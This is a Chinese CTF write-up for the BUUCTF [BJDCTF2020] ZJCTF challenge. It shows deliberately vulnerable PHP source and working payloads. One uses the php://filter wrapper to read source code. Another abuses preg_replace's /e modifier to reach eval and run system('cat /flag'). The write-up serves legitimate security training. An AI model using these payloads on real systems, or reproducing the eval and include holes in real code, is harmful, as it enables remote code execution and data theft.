BUUCTF [BJDCTF2020] ZJCTF,不过如此
考点:
- php伪协议读取源码
- 函数
preg_replace()
在\e
模式下,存在代码执行漏洞 - 对于传入的非法的
$_GET
数组参数名,会将其转换成下划线_
启动环境,给出源码:
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
分析代码:
- 需要通过GET方式传入变量
$text
变量$flie
的值 file_get_contents()
函数以只读方式打开- 变量
$text
中内容应为I have a dream
- 提示变量
$file
的值应该为next.php
file_get_contents()
函数把整个文件读入一个字符串中,可以使用php伪协议,传入变量$text
的值,并且读出next.php
的源码:
?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
将内容进行Base64解码,得到next.php
页面的源码:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace('/('.$re.')/ei', 'strtolower("\\1")', $str);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
源码分析:
- 需要通过GET方式传入变量
$id
的值 complex()
函数将变量$re
、strtolower("\\1")
、变量$str
进行拼接替换foreach()
函数将$_GET
数组中的键名赋给变量$re
,键值赋给变量$str
getFlag()
函数可以实现命令执行
函数preg_replace()
在\e
模式下,存在代码执行漏洞
参考文章:深入研究preg_replace与代码执行
通过查阅资料
preg_replace()
使用了/e
模式,可以代码执行,而且该函数的第一个和第三个参数都是我们可以控制的。
preg_replac()
函数当匹配到符合正则表达式的字符串时,第二个参数的字符串可被当做代码来执行。
strtolower("\\1")
当中的\\1
实际上就是\1
,这里的\1
实际上指定的是第一个子匹配项,而\1
在正则表达式中有自己的含义。
反向引用:
对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问,其中 n 为一个标识特定缓冲区的一位或两位十进制数。
另外,在PHP中,对于传入的非法的$_GET
数组参数名,会将其转换成下划线,比如.
,所以构造:\S*=${phpinfo()}
测试:
可以看到phpinfo()
命令被成功执行,尝试执行getFlag()
函数:
next.php?\S*=${getFlag()}&cmd=system('pwd');
可以看到命令被成功执行,继续寻找flag的位置:
next.php?\S*=${getFlag()}&cmd=system('ls /');
flag在/
目录下,构造最终Payload:
next.php?\S*=${getFlag()}&cmd=system('cat /flag');
得到flag: